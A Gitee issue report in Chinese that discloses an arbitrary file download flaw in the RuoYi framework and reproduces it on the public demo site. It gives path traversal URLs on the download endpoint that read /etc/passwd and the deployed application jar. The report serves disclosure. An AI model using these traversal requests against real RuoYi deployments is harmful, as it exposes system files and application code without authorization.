任意文件读取漏洞紧急

项目上线被扫除安全漏洞问题，可以下载服务器上任意文件 。如下：
![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/185256_0f4ab650_5301618.png "Snipaste_2020-11-16_18-52-17.png")

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/185306_5881b983_5301618.png "Snipaste_2020-11-16_18-51-54.png")

### ruoyi在线demo 也复现了这个漏洞，任意文件下载
 https://demo.ruoyi.vip/
![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/213301_88ea8585_5301618.png "屏幕截图.png")

#### 复现步骤如下：

1. 登录 https://demo.ruoyi.vip/   
2. 打开以下链接会自动下载服务器上的文件 （/etc/passwd可以替换为任意文件绝对路径）： 
     https://demo.ruoyi.vip/common/download/resource?resource=/profile/../../../../etc/passwd
     ![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/204925_496fec75_5301618.png "屏幕截图.png")
![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/205018_e74fca0c_5301618.png "屏幕截图.png")
  下载的文件如下：![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/205144_e8013cd8_5301618.png "屏幕截图.png")

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/211533_042170d7_5301618.png "屏幕截图.png")

demo源代码下载地址：https://demo.ruoyi.vip/common/download/resource?resource=/profile/../../../../home/ruoyi/projects/ruoyi/target/ruoyi.jar

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/212940_93c3efd7_5301618.png "屏幕截图.png")

GVP 若依/RuoYi

内容风险标识

评论 (3)

GVP若依/RuoYi

内容风险标识